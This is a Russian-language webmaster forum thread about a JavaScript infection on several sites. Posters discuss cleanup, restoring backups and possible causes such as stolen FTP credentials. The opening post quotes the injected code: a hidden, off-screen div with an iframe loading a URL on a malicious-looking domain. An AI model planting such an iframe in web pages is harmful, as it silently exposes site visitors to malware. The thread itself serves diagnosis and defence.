Javascript-вирус?

TO
На сайте с 21.09.2007
Offline
170
13572

Сегодня утром антивирус стал ругаться на мои сайты (вчера вечером было все нормально).

Смотрю html-код - все нормально.

Смотрю через firebug - вижу внизу (до закрывающего тега body) такой код:

<div style="z-index: -10000; visibility: hidden; position: absolute; width: 50px; height: 50px;">
<iframe width="50" scrolling="no" height="50" frameborder="0" src="http://activatedreplacing.is-very-evil.org/index.php?28d9000e56c2a63080ff89c6f5357591">
</div>

Антивирус, соответственно, ругается на ссылку в айфрейме.

Сейчас буду разбираться, куда растут у это ноги (ведь, внедрение произошло не в html-код, а куда-то в яваскрипт, откуда это попадает на страницы). Также не знаю пока, это коснулось только самописных движков, либо CMS тоже.

Кто-нибудь сталкивался?

R
На сайте с 24.01.2008
Offline
180
#1

Было бы хорошо, если вирус прописался тупо в шаблоне, источник может быть и паблик движок (его дырки) или залитый шелл, если шелл, то тут уже проблем становится больше - это слитый сайт, проставленные левые ссылки в контенте и др. дребедень.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
A0
На сайте с 22.03.2009
Offline
229
#2

Кто-нибудь сталкивался?

На днях у клиента на всём фтп заразили .js файлы - и самописы пострадали, и вп и форум.

Продвижение и поддержка сайтов. Актуальное конкурентное портфолио. ICQ - 407354474.
TO
На сайте с 21.09.2007
Offline
170
#3

Rxp, пока что замечено только на самописных движках.

alex063, есть пример, что за заразу в них подсунули?

UPD. Хотя, только что нашел. Вот такую красоту:

V3
На сайте с 28.02.2012
Offline
0
#4

тоже подхватил эту заразу. Судя по всему появилась либо вчера либо сегодня. Бэкапы хоста не помагают. В гугле как то глухо, окромя этой темы. Отпишитесь в ветке пожалуйста если найдете решение. А то я совсем нуб в этом деле...

TO
На сайте с 21.09.2007
Offline
170
#5

Я кое-где почистил руками, но когда понял, что заражены все несколько десятков сайтов (в каждом примерно столько же js файлов), написал хостеру, чтобы восстановил бекап за воскресение (когда все было нормально).

Если в воскресном бекапе будет та же фигня, буду восстанавливать еще более ранний. Но руками это чистить - убитый день.

A0
На сайте с 22.03.2009
Offline
229
#6

t_o_x_a, да, да, именно такая штука была. Руками не вариант, порой много файлов заражено, а бэкапы доисторические даже подойдут, так как .js очееень редко меняются.

TO
На сайте с 21.09.2007
Offline
170
#7

alex063, кстати в чем может быть причина?

Вирус на компе и хранение паролей в незащищенном виде в фтп-клиенте?

V3
На сайте с 28.02.2012
Offline
0
#8

У меня всего пара сайтиков. Я к сожалению не силен в скриптах.

Я так понимаю, что объявление переменной с именем состоящим из рандомного набора буков и цифер , после которого идет много циферок, это и есть зараженный участок файла, который следует удалить. Поправьте если не прав.

TO
На сайте с 21.09.2007
Offline
170
#9

VASYA13, именно. Все, что начинается с этой переменной и до конца js-файла следует удалить.

A0
На сайте с 22.03.2009
Offline
229
#10
t_o_x_a:
alex063, кстати в чем может быть причина?

Вирус на компе и хранение паролей в незащищенном виде в фтп-клиенте?

А фиг его знает. Скорее всего это, т.к. ломанули только один аккаунт этого клиента, подозреваю что проблема на его стороне, иначе поломали бы и ещё и других. А вот где он хранит пароли, кому их раздаёт и чем защищается не знаю...

Мой антивирь даже не дал скачать заражённые файлы с фтп на диск.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий